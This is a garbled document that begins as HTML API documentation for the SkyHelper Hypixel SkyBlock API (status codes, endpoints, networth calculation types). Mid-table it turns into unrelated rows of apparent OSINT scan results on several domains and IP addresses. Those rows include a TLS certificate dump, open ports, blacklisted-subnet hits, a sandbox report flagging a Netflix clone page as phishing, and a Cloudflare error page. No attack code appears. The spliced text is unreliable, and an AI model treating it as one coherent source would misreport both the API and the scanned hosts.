<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:18:ae:06:7e:fc:0b:78:46:5c:8b:fe:1a:31:bf:5b:16:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 17:51:43 2022 GMT
Not After : Mar 13 17:51:42 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d2:a8:d4:9f:a9:bd:76:f3:4e:fa:75:b4:78:5e:
d8:6a:71:e4:f3:f9:c2:77:fe:f9:7d:4c:da:66:22:
e0:cd:34:b7:7c:8d:14:1c:4d:7d:46:bd:0d:78:0c:
dd:5b:c4:ff:9f:13:d1:36:82:30:3b:b9:24:f9:65:
eb:d4:82:59:47:e9:be:2d:ca:25:2b:a1:b5:27:87:
63:33:e8:be:3d:46:8c:9b:0f:9e:b7:28:4d:eb:79:
63:20:73:aa:a3:d5:3d:c6:2e:b7:9c:7f:e7:f8:96:
79:6d:51:52:62:f7:cc:65:ca:dd:5b:ef:27:c9:9c:
81:e6:4a:8c:e9:e1:99:cd:79:f8:60:4b:a5:6b:6f:
c9:a2:fa:cc:0c:e7:34:b2:77:b5:de:bd:fe:24:a9:
e6:e9:26:4a:54:ec:0f:53:69:fc:a9:cb:fb:84:2e:
7d:af:75:b6:15:ef:6d:e3:fb:23:27:72:c7:fd:a8:
77:78:c9:f6:5b:6f:b1:0a:09:7c:e3:91:c1:95:13:
b4:4a:b2:6f:b1:ab:4c:4d:0b:11:8c:fd:8d:fb:d9:
37:66:3b:07:7b:cc:19:50:a2:89:0c:ea:8d:f1:d1:
b3:36:06:ad:51:15:23:e4:0c:43:f6:cc:90:55:fa:
98:c8:81:54:f2:2f:f7:d0:0b:4f:9f:38:a8:6c:71:
67:c5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
46:DD:F2:80:57:6C:FD:50:6F:F3:DF:3E:F6:D6:F8:E4:B9:2D:C4:6F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 18:51:43.785 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:E2:3A:9E:51:10:7B:4C:32:13:F1:5A:
6A:72:5F:B6:48:D3:B8:D4:7D:48:A2:D1:1B:9F:EB:E7:
11:FF:38:46:00:02:21:00:D3:77:1A:17:F1:84:6D:6C:
D3:83:45:FF:8A:32:05:10:85:83:2B:14:0A:F5:20:00:
0A:C7:41:FB:1B:F5:B4:74
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 13 18:51:43.756 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:A6:36:07:C7:E6:2A:25:82:42:12:4D:
3F:F8:74:7A:85:A6:64:36:C2:59:78:48:20:18:36:E7:
26:72:A3:D3:2A:02:21:00:CE:BD:F6:83:26:75:28:EF:
BF:A1:B5:32:8B:FB:88:31:3E:85:D6:30:F1:F3:D4:9D:
92:CD:06:30:FD:39:59:E8
Signature Algorithm: sha256WithRSAEncryption
a9:06:04:95:e2:ce:64:b2:f3:1c:fd:0a:94:52:d2:fb:cc:c9:
bb:ab:0e:16:c4:1c:35:3d:b4:77:7c:ef:d6:ce:15:8a:5b:9e:
15:7d:14:b0:74:3a:46:24:d1:6f:34:39:94:aa:e4:7f:b3:c9:
dd:04:77:c5:ed:88:f9:56:f6:b2:da:16:f2:de:95:4d:ae:cc:
c8:8f:2c:fe:b6:1f:27:28:b2:fe:3a:41:41:5e:a9:6f:ac:34:
59:b2:f1:77:96:18:6e:7d:12:a0:7b:52:1d:2d:59:87:c8:35:
17:48:37:92:0d:56:c5:76:a2:4a:4c:44:69:ac:a7:c0:72:d3:
f1:3c:5f:67:11:8b:f4:4a:b6:30:14:01:f3:f3:67:9a:5c:2e:
68:09:32:e8:4e:f1:3c:d1:09:b1:a6:43:2f:3e:bb:09:66:13:
cc:5d:ab:f8:25:f6:78:95:33:b3:b2:17:2b:15:e6:77:00:0d:
a1:3e:62:fc:76:b4:f3:f1:09:99:3e:08:aa:64:da:d8:5e:3a:
0f:1e:07:1c:09:b4:d2:9f:70:f7:12:f8:0a:19:e8:db:b1:ab:
d6:b6:c1:9f:ab:18:be:a8:46:0e:6f:9c:06:b3:0d:0a:44:0f:
f9:65:04:25:ce:38:c1:7b:7d:87:a9:b5:0f:1d:54:1a:8b:7d:
b8:c2:59:33
|
| 2023-05-12 02:55:21 | Open TCP Port Banner | No | Censys | 0 | 1 | 3 | 0 | None | SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1 | 207.154.228.169 |
| 2023-05-12 02:55:18 | Operating System | No | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 46.101.229.70 |
| 2023-05-12 03:00:54 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.86): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.0): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:59 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 41.8781, -87.6298 | 104.21.71.14 |
| 2023-05-12 02:50:53 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://thedude23.github.io/netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3000"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb8_IE_EarlyTabStart_0xdb4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb8_ConnHashTable<3000>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb8_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb8_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "IsoScope_bb8_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_bb8_IESQMMUTEX_0_519"\n "IsoScope_bb8_IE_EarlyTabStart_0xdb4_Mutex"\n "IsoScope_bb8_ConnHashTable<3000>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', 
u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.194.8.120:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"i.ibb.co"\n "thedude23.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ".fa-cc-paypal:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string ".fa-paypal:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string ".fa-twitter:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string ".fa-twitter-square:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string ".fa-youtube:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string ".fa-youtube-square:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string "<a href="https://www.netflix.com/" class="btn btn-rounded">Sign In</a>" (Indicator: "dir "; File: "netflix-clone_1_.htm")\n Found string "<a href="https://www.netflix.com/" class="btn btn-xl"" (Indicator: "dir "; File: "netflix-clone_1_.htm")\n Found string "Watch right on Netflix.com." 
(Indicator: "dir "; File: "netflix-clone_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar77B.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "netflix-fav_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62) quality = 82" baseline precision 8 900x900 components 3" and extension "jpg"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', 
u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1560', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1560', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab76A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab76A.tmp]- [targetUID: 00000000-00001884]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Tar77B.tmp" has type "data"- Location: [%TEMP%\\Tar77B.tmp]- [targetUID: 00000000-00001884]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Cab76A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab76A.tmp]- [targetUID: 00000000-00001884]\n "Cab6E9.tmp" has type "data"- 
Location: [%TEMP%\\Cab6E9.tmp]- [targetUID: 00000000-00001884]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001884]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "netflix-fav_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62) quality = 82" baseline precision 8 900x900 components 3"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003000]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFDD7E91FED3593DEC.TMP" has type "data"- Location: [%TEMP%\\~DFDD7E91FED3593DEC.TMP]- [targetUID: 00000000-00003000]\n "~DF54A0D439AE08C5A5.TMP" has type "data"- Location: [%TEMP%\\~DF54A0D439AE08C5A5.TMP]- [targetUID: 00000000-00003000]\n "~DF9E21D26384C65AFE.TMP" has type "data"- Location: [%TEMP%\\~DF9E21D26384C65AFE.TMP]- [targetUID: 00000000-00003000]\n "~DF249C4A46112B4859.TMP" has type "data"- Location: [%TEMP%\\~DF249C4A46112B4859.TMP]- [targetUID: 00000000-00003000]\n "urlref_httpsthedude23.github.ionetflix-clone" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "RecoveryStore._D375E0FF-EF98-11ED-98AF-080027A7DD56_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D375E101-EF98-11ED-98AF-080027A7DD56_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_DDEB9FEC-EF98-11ED-98AF-080027A7DD56_.dat" has type "Composite 
Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00001884]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "LEMAY786.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LEMAY786.txt]- [targetUID: 00000000-00001884]\n "KJPXKWFZ.txt" | 185.199.108.153 |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.78): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:12 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.125): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Connectionpoint (Net ID: 00:01:E3:52:11:50) | 50.1188, 8.6843 |
| 2023-05-12 03:32:02 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.2:80 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Web Content | No | Web Spider | 3 | 0 | 2 | 0 | None | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>nuke.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:20 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">nuke.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f605eb97732c7</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
| nuke.battleb0t.xyz |
| 2023-05-12 02:53:56 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8001::153:443 | 2606:50c0:8001::153 |
| 2023-05-12 02:54:07 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:44:15 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | funny.battleb0t.xyz |
